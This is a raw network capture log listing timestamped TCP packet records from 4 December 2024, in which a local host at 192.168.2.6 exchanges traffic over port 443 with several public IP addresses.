                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.919384003 CET50061443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.919406891 CET44350061172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.920262098 CET50062443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.920445919 CET44350061172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.920452118 CET44350062172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.920516014 CET50061443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.921411037 CET50061443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.922137976 CET44350061172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.937019110 CET50071443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.937062979 CET443500714.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.937124968 CET50071443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.962683916 CET50062443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.990974903 CET50071443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.991003990 CET443500714.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.004616022 CET50064443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.004635096 CET44350064172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.004633904 CET50063443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.004633904 CET50061443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.004666090 CET44350063172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.004683971 CET44350061172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.155201912 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.155306101 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.155478954 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.174096107 CET50046443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.174125910 CET44350046159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.204483986 CET50064443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.204497099 CET50063443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.204497099 CET50061443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.282516956 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.282543898 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.282577038 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.282649040 CET50055443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.282660961 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.284007072 CET50055443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.284024954 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.284054995 CET50055443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.284194946 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.284229040 CET4435005520.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.284282923 CET50055443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.375114918 CET50072443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.375186920 CET4435007220.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.375317097 CET50072443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.375619888 CET50072443192.168.2.620.190.177.85
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.375633001 CET4435007220.190.177.85192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.648417950 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.648493052 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.648504972 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.648519993 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.648546934 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.648571968 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.649802923 CET50054443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.649820089 CET44350054159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.694293976 CET50073443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.694345951 CET44350073159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.694411039 CET50073443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.694849968 CET50073443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.694866896 CET44350073159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.918430090 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.918735981 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.918761015 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.920404911 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.920471907 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.921992064 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.922187090 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.922195911 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.967340946 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.972172022 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:22.972204924 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.019360065 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.045779943 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.046061993 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.046087980 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.046662092 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.046677113 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.046734095 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.046745062 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.046778917 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.047393084 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.048978090 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.049165964 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.049173117 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.049264908 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.095679998 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.095700979 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.143042088 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.232806921 CET443500714.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.233057976 CET50071443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.233094931 CET443500714.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.233441114 CET443500714.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.233495951 CET50071443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.234163046 CET443500714.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.234219074 CET50071443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.236063957 CET50071443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.236141920 CET443500714.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.236916065 CET50071443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.236929893 CET443500714.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.237001896 CET50071443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.279341936 CET443500714.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.298512936 CET50071443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.386606932 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.386651993 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.386817932 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.387072086 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.387084961 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.402175903 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.402232885 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.402396917 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.402673960 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.402682066 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.491674900 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.491709948 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.491718054 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.491730928 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.491736889 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.491739988 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.491766930 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.491802931 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.491820097 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.491844893 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.564897060 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.564941883 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.565069914 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.565346003 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.565362930 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.580820084 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.580836058 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.580907106 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.580943108 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.625822067 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.632205009 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.632221937 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.632261038 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.632277966 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.632308960 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.632342100 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.632369041 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.632395983 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.683231115 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.683249950 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.683341980 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.683377028 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.685986996 CET443500714.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.686177015 CET443500714.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.686254025 CET50071443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.687263966 CET50071443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.687283039 CET443500714.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.736325026 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.744102001 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.748488903 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.750998020 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.751034975 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.751264095 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.751327038 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.760189056 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.760257006 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.760288954 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.775528908 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.775552988 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.775604963 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.775634050 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.775686979 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.782216072 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.782228947 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.782269955 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.782283068 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.782310009 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.782341957 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.782361984 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.782392025 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.784802914 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.796658993 CET50077443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.796705961 CET44350077159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.796907902 CET50077443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.797372103 CET50077443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.797380924 CET44350077159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.800354004 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.800430059 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.800455093 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.811960936 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.812513113 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.812524080 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.812562943 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.812602997 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.812642097 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.812649965 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.812664986 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.812671900 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.812711000 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.832541943 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.832583904 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.832632065 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.832668066 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.832689047 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.832693100 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.832731962 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.832948923 CET50070443192.168.2.623.44.203.16
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.832967043 CET4435007023.44.203.16192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.859281063 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.868316889 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.872608900 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.872673035 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.872704983 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.917349100 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.930463076 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.948640108 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.948694944 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.948723078 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.957504988 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.957644939 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.957667112 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.963165045 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.966912985 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.966998100 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.967016935 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.967319965 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.974251032 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.982912064 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.983004093 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.983025074 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.993889093 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.993954897 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:23.993973017 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.008027077 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.008105040 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.008143902 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.021253109 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.021341085 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.021367073 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.034796000 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.034926891 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.034951925 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.048034906 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.048132896 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.048156977 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.060230017 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.060336113 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.060358047 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.072978020 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.073054075 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.073072910 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.084824085 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.084891081 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.084912062 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.096911907 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.096995115 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.097017050 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.119395018 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.119461060 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.119481087 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.131532907 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.131598949 CET50066443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.131629944 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.146131992 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.146169901 CET44350066142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:24.146260023 CET50066443192.168.2.6142.250.181.65
